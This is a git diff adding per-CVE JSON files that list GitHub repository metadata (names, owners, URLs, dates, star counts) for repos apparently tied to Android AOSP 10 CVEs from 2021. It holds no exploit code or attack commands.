"full_name": "nanopathi\/system_bt_AOSP10_r33_CVE-2021-0476", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/system_bt_AOSP10_r33_CVE-2021-0476", + "description": null, + "fork": false, + "created_at": "2022-04-04T07:35:45Z", + "updated_at": "2022-04-04T07:50:01Z", + "pushed_at": "2022-04-04T07:50:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0478.json b/2021/CVE-2021-0478.json new file mode 100644 index 0000000000..3f5583679e --- /dev/null +++ b/2021/CVE-2021-0478.json @@ -0,0 +1,33 @@ +[ + { + "id": 482818616, + "name": "frameworks_base_AOSP10_r33_CVE-2021-0478", + "full_name": "Satheesh575555\/frameworks_base_AOSP10_r33_CVE-2021-0478", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/frameworks_base_AOSP10_r33_CVE-2021-0478", + "description": null, + "fork": false, + "created_at": "2022-04-18T11:16:45Z", + "updated_at": "2023-03-27T01:35:15Z", + "pushed_at": "2022-04-18T11:22:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0481.json b/2021/CVE-2021-0481.json new file mode 100644 index 0000000000..1eb27ff6f1 --- /dev/null +++ b/2021/CVE-2021-0481.json @@ -0,0 +1,33 @@ +[ + { + "id": 484368544, + "name": "packages_apps_settings_AOSP10_r33_CVE-2021-0481", + "full_name": "ShaikUsaf\/packages_apps_settings_AOSP10_r33_CVE-2021-0481", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/packages_apps_settings_AOSP10_r33_CVE-2021-0481", + "description": null, + "fork": false, + "created_at": "2022-04-22T09:10:38Z", + "updated_at": "2022-04-22T10:05:57Z", + "pushed_at": "2022-04-22T10:06:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0506.json b/2021/CVE-2021-0506.json new file mode 100644 index 0000000000..c7cd4907f6 --- /dev/null +++ b/2021/CVE-2021-0506.json @@ -0,0 +1,33 @@ +[ + { + "id": 480771917, + "name": "packages_apps_Settings_AOSP10_r33_CVE-2021-0506", + "full_name": "Satheesh575555\/packages_apps_Settings_AOSP10_r33_CVE-2021-0506", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/packages_apps_Settings_AOSP10_r33_CVE-2021-0506", + "description": null, + "fork": false, + "created_at": "2022-04-12T11:02:00Z", + "updated_at": "2023-03-27T01:49:18Z", + "pushed_at": "2022-04-12T11:05:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0507.json b/2021/CVE-2021-0507.json new file mode 100644 index 0000000000..1d2269bf5a --- /dev/null +++ b/2021/CVE-2021-0507.json @@ -0,0 +1,33 @@ +[ + { + "id": 479956793, + "name": "system_bt_AOSP10_r33_CVE-2021-0507", + "full_name": "nanopathi\/system_bt_AOSP10_r33_CVE-2021-0507", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/system_bt_AOSP10_r33_CVE-2021-0507", + "description": null, + "fork": false, + "created_at": "2022-04-10T08:26:52Z", + "updated_at": "2022-04-10T08:31:35Z", + "pushed_at": "2022-04-10T08:32:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0508.json b/2021/CVE-2021-0508.json new file mode 100644 index 0000000000..879c0a61e8 --- /dev/null +++ b/2021/CVE-2021-0508.json @@ -0,0 +1,33 @@ +[ + { + "id": 483964254, + "name": "frameworks_av_AOSP10_r33_CVE-2021-0508", + "full_name": "nanopathi\/frameworks_av_AOSP10_r33_CVE-2021-0508", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/frameworks_av_AOSP10_r33_CVE-2021-0508", + "description": null, + "fork": false, + "created_at": "2022-04-21T08:15:00Z", + "updated_at": "2022-04-21T08:28:19Z", + "pushed_at": "2022-04-21T08:28:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0509.json b/2021/CVE-2021-0509.json new file mode 100644 index 0000000000..1fa6e3ffc5 --- /dev/null +++ b/2021/CVE-2021-0509.json @@ -0,0 +1,33 @@ +[ + { + "id": 483931356, + "name": "frameworks_av_AOSP10_r33_CVE-2021-0509", + "full_name": "Trinadh465\/frameworks_av_AOSP10_r33_CVE-2021-0509", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_av_AOSP10_r33_CVE-2021-0509", + "description": null, + "fork": false, + "created_at": "2022-04-21T06:23:26Z", + "updated_at": "2023-03-23T01:17:11Z", + "pushed_at": "2022-04-21T06:35:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0510.json b/2021/CVE-2021-0510.json new file mode 100644 index 0000000000..4bfde46f6e --- /dev/null +++ b/2021/CVE-2021-0510.json @@ -0,0 +1,33 @@ +[ + { + "id": 483645707, + "name": "hardware_interfaces-A10_r33_CVE-2021-0510", + "full_name": "pazhanivel07\/hardware_interfaces-A10_r33_CVE-2021-0510", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/hardware_interfaces-A10_r33_CVE-2021-0510", + "description": null, + "fork": false, + "created_at": "2022-04-20T12:29:25Z", + "updated_at": "2022-04-20T12:32:50Z", + "pushed_at": "2022-04-20T12:33:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0511.json b/2021/CVE-2021-0511.json new file mode 100644 index 0000000000..f604f2d054 --- /dev/null +++ b/2021/CVE-2021-0511.json @@ -0,0 +1,33 @@ +[ + { + "id": 487194778, + "name": "platform_art_AOSP10_r33_CVE-2021-0511", + "full_name": "Trinadh465\/platform_art_AOSP10_r33_CVE-2021-0511", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/platform_art_AOSP10_r33_CVE-2021-0511", + "description": null, + "fork": false, + "created_at": "2022-04-30T05:54:11Z", + "updated_at": "2022-04-30T05:57:05Z", + "pushed_at": "2022-04-30T05:58:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0513.json b/2021/CVE-2021-0513.json new file mode 100644 index 0000000000..09bbc1bc6f --- /dev/null +++ b/2021/CVE-2021-0513.json @@ -0,0 +1,33 @@ +[ + { + "id": 484659915, + "name": "framework_base_AOSP10_r33_CVE-2021-0513", + "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2021-0513", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2021-0513", + "description": null, + "fork": false, + "created_at": "2022-04-23T05:50:23Z", + "updated_at": "2022-04-23T06:23:48Z", + "pushed_at": "2022-04-23T06:23:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0516.json b/2021/CVE-2021-0516.json new file mode 100644 index 0000000000..2afe839cbc --- /dev/null +++ b/2021/CVE-2021-0516.json @@ -0,0 +1,33 @@ +[ + { + "id": 486837214, + "name": "external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0516", + "full_name": "Satheesh575555\/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0516", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0516", + "description": null, + "fork": false, + "created_at": "2022-04-29T04:30:40Z", + "updated_at": "2023-08-29T13:26:17Z", + "pushed_at": "2022-04-29T04:39:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0519.json b/2021/CVE-2021-0519.json new file mode 100644 index 0000000000..a390a2e2c1 --- /dev/null +++ b/2021/CVE-2021-0519.json @@ -0,0 +1,33 @@ +[ + { + "id": 484167887, + "name": "external_libavc_AOSP10_r33_CVE-2021-0519", + "full_name": "nanopathi\/external_libavc_AOSP10_r33_CVE-2021-0519", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/external_libavc_AOSP10_r33_CVE-2021-0519", + "description": null, + "fork": false, + "created_at": "2022-04-21T18:47:00Z", + "updated_at": "2022-04-21T18:54:27Z", + "pushed_at": "2022-04-21T18:55:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0520.json b/2021/CVE-2021-0520.json new file mode 100644 index 0000000000..7fe58e8c2e --- /dev/null +++ b/2021/CVE-2021-0520.json @@ -0,0 +1,64 @@ +[ + { + "id": 478992025, + "name": "frameworks_av_AOSP10_r33_CVE-2021-0520", + "full_name": "nanopathi\/frameworks_av_AOSP10_r33_CVE-2021-0520", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/frameworks_av_AOSP10_r33_CVE-2021-0520", + "description": null, + "fork": false, + "created_at": "2022-04-07T13:14:03Z", + "updated_at": "2022-04-07T13:20:16Z", + "pushed_at": "2022-04-07T13:20:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 517644190, + "name": "frameworks_av_AOSP10_r33_CVE-2021-0520", + "full_name": "ShaikUsaf\/frameworks_av_AOSP10_r33_CVE-2021-0520", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/frameworks_av_AOSP10_r33_CVE-2021-0520", + "description": null, + "fork": false, + "created_at": "2022-07-25T11:51:11Z", + "updated_at": "2022-07-25T11:53:59Z", + "pushed_at": "2022-07-25T11:54:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0522.json b/2021/CVE-2021-0522.json new file mode 100644 index 0000000000..d7fc0056a3 --- /dev/null +++ b/2021/CVE-2021-0522.json @@ -0,0 +1,33 @@ +[ + { + "id": 484301078, + "name": "system_bt_AOSP10_r33_CVE-2021-0522", + "full_name": "nanopathi\/system_bt_AOSP10_r33_CVE-2021-0522", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/system_bt_AOSP10_r33_CVE-2021-0522", + "description": null, + "fork": false, + "created_at": "2022-04-22T04:59:56Z", + "updated_at": "2022-04-22T05:05:46Z", + "pushed_at": "2022-04-22T05:06:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0586.json b/2021/CVE-2021-0586.json new file mode 100644 index 0000000000..c9b8aba2d1 --- /dev/null +++ b/2021/CVE-2021-0586.json @@ -0,0 +1,33 @@ +[ + { + "id": 485275591, + "name": "packages_apps_Settings_CVE-2021-0586", + "full_name": "nanopathi\/packages_apps_Settings_CVE-2021-0586", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/packages_apps_Settings_CVE-2021-0586", + "description": null, + "fork": false, + "created_at": "2022-04-25T07:58:29Z", + "updated_at": "2022-04-25T08:03:35Z", + "pushed_at": "2023-04-17T12:36:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0589.json b/2021/CVE-2021-0589.json new file mode 100644 index 0000000000..b3f4ed9e21 --- /dev/null +++ b/2021/CVE-2021-0589.json @@ -0,0 +1,64 @@ +[ + { + "id": 497858524, + "name": "System_bt_AOSP10_r33_CVE-2021-0589", + "full_name": "Trinadh465\/System_bt_AOSP10_r33_CVE-2021-0589", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/System_bt_AOSP10_r33_CVE-2021-0589", + "description": null, + "fork": false, + "created_at": "2022-05-30T08:41:07Z", + "updated_at": "2023-08-29T14:00:30Z", + "pushed_at": "2022-05-30T08:43:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 500419770, + "name": "system_bt_AOSP10_r33_CVE-2021-0589", + "full_name": "Satheesh575555\/system_bt_AOSP10_r33_CVE-2021-0589", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/system_bt_AOSP10_r33_CVE-2021-0589", + "description": null, + "fork": false, + "created_at": "2022-06-06T12:13:41Z", + "updated_at": "2023-08-29T12:48:33Z", + "pushed_at": "2022-06-06T12:15:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0594.json b/2021/CVE-2021-0594.json new file mode 100644 index 0000000000..a4aa4b9b26 --- /dev/null +++ b/2021/CVE-2021-0594.json @@ -0,0 +1,33 @@ +[ + { + "id": 482734063, + "name": "packages_apps_Nfc_AOSP10_r33_CVE-2021-0594", + "full_name": "Satheesh575555\/packages_apps_Nfc_AOSP10_r33_CVE-2021-0594", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/packages_apps_Nfc_AOSP10_r33_CVE-2021-0594", + "description": null, + "fork": false, + "created_at": "2022-04-18T06:06:42Z", + "updated_at": "2022-04-18T06:08:50Z", + "pushed_at": "2022-04-18T06:09:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0595.json b/2021/CVE-2021-0595.json new file mode 100644 index 0000000000..cc88261eb4 --- /dev/null +++ b/2021/CVE-2021-0595.json @@ -0,0 +1,64 @@ +[ + { + "id": 470544287, + "name": "Settings-CVE-2021-0595", + "full_name": "pazhanivel07\/Settings-CVE-2021-0595", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/Settings-CVE-2021-0595", + "description": null, + "fork": false, + "created_at": "2022-03-16T10:59:58Z", + "updated_at": "2022-03-16T10:59:58Z", + "pushed_at": "2022-03-16T10:59:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 484316243, + "name": "frameworks_base_Aosp10_r33_CVE-2021-0595", + "full_name": "pazhanivel07\/frameworks_base_Aosp10_r33_CVE-2021-0595", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/frameworks_base_Aosp10_r33_CVE-2021-0595", + "description": null, + "fork": false, + "created_at": "2022-04-22T06:09:00Z", + "updated_at": "2023-03-27T01:19:18Z", + "pushed_at": "2022-04-22T07:02:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0600.json b/2021/CVE-2021-0600.json new file mode 100644 index 0000000000..5d717dea54 --- /dev/null +++ b/2021/CVE-2021-0600.json @@ -0,0 +1,33 @@ +[ + { + "id": 480769086, + "name": "packages_apps_Settings_AOSP10_r33_CVE-2021-0600", + "full_name": "Satheesh575555\/packages_apps_Settings_AOSP10_r33_CVE-2021-0600", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/packages_apps_Settings_AOSP10_r33_CVE-2021-0600", + "description": null, + "fork": false, + "created_at": "2022-04-12T10:53:20Z", + "updated_at": "2023-03-27T01:48:31Z", + "pushed_at": "2022-04-12T10:56:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0640.json b/2021/CVE-2021-0640.json new file mode 100644 index 0000000000..32b1cd4bf3 --- /dev/null +++ b/2021/CVE-2021-0640.json @@ -0,0 +1,33 @@ +[ + { + "id": 483976622, + "name": "frameworks_base_AOSP10_r33_CVE-2021-0640", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2021-0640", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2021-0640", + "description": null, + "fork": false, + "created_at": "2022-04-21T08:53:08Z", + "updated_at": "2023-03-27T01:46:25Z", + "pushed_at": "2022-04-21T09:16:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0652.json b/2021/CVE-2021-0652.json new file mode 100644 index 0000000000..519079a086 --- /dev/null +++ b/2021/CVE-2021-0652.json @@ -0,0 +1,33 @@ +[ + { + "id": 476594576, + "name": "frameworks_base_AOSP10_r33_CVE-2021-0652", + "full_name": "Satheesh575555\/frameworks_base_AOSP10_r33_CVE-2021-0652", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/frameworks_base_AOSP10_r33_CVE-2021-0652", + "description": null, + "fork": false, + "created_at": "2022-04-01T06:06:53Z", + "updated_at": "2023-03-27T01:21:26Z", + "pushed_at": "2022-04-01T06:15:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0683.json b/2021/CVE-2021-0683.json new file mode 100644 index 0000000000..39ca6c9ae5 --- /dev/null +++ b/2021/CVE-2021-0683.json @@ -0,0 +1,33 @@ +[ + { + "id": 484377066, + "name": "framework_base_AOSP10_r33_CVE-2021-0683_CVE-2021-0708", + "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2021-0683_CVE-2021-0708", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2021-0683_CVE-2021-0708", + "description": null, + "fork": false, + "created_at": "2022-04-22T09:39:02Z", + "updated_at": "2022-04-22T09:52:40Z", + "pushed_at": "2022-04-22T09:52:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0688.json b/2021/CVE-2021-0688.json new file mode 100644 index 0000000000..4ada373a1b --- /dev/null +++ b/2021/CVE-2021-0688.json @@ -0,0 +1,33 @@ +[ + { + "id": 480784663, + "name": "frameworks_base_AOSP10_r33_CVE-2021-0688", + "full_name": "Satheesh575555\/frameworks_base_AOSP10_r33_CVE-2021-0688", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/frameworks_base_AOSP10_r33_CVE-2021-0688", + "description": null, + "fork": false, + "created_at": "2022-04-12T11:40:23Z", + "updated_at": "2023-03-27T01:12:42Z", + "pushed_at": "2022-04-12T11:46:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0705.json b/2021/CVE-2021-0705.json new file mode 100644 index 0000000000..8bcc47e137 --- /dev/null +++ b/2021/CVE-2021-0705.json @@ -0,0 +1,64 @@ +[ + { + "id": 482745572, + "name": "frameworks_base_AOSP10_r33_CVE-2021-0705", + "full_name": "ShaikUsaf\/frameworks_base_AOSP10_r33_CVE-2021-0705", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/frameworks_base_AOSP10_r33_CVE-2021-0705", + "description": null, + "fork": false, + "created_at": "2022-04-18T06:51:16Z", + "updated_at": "2022-04-18T07:06:25Z", + "pushed_at": "2022-04-18T07:06:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 484649034, + "name": "frameworks_base_AOSP10_r33_CVE-2021-0705", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2021-0705", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": 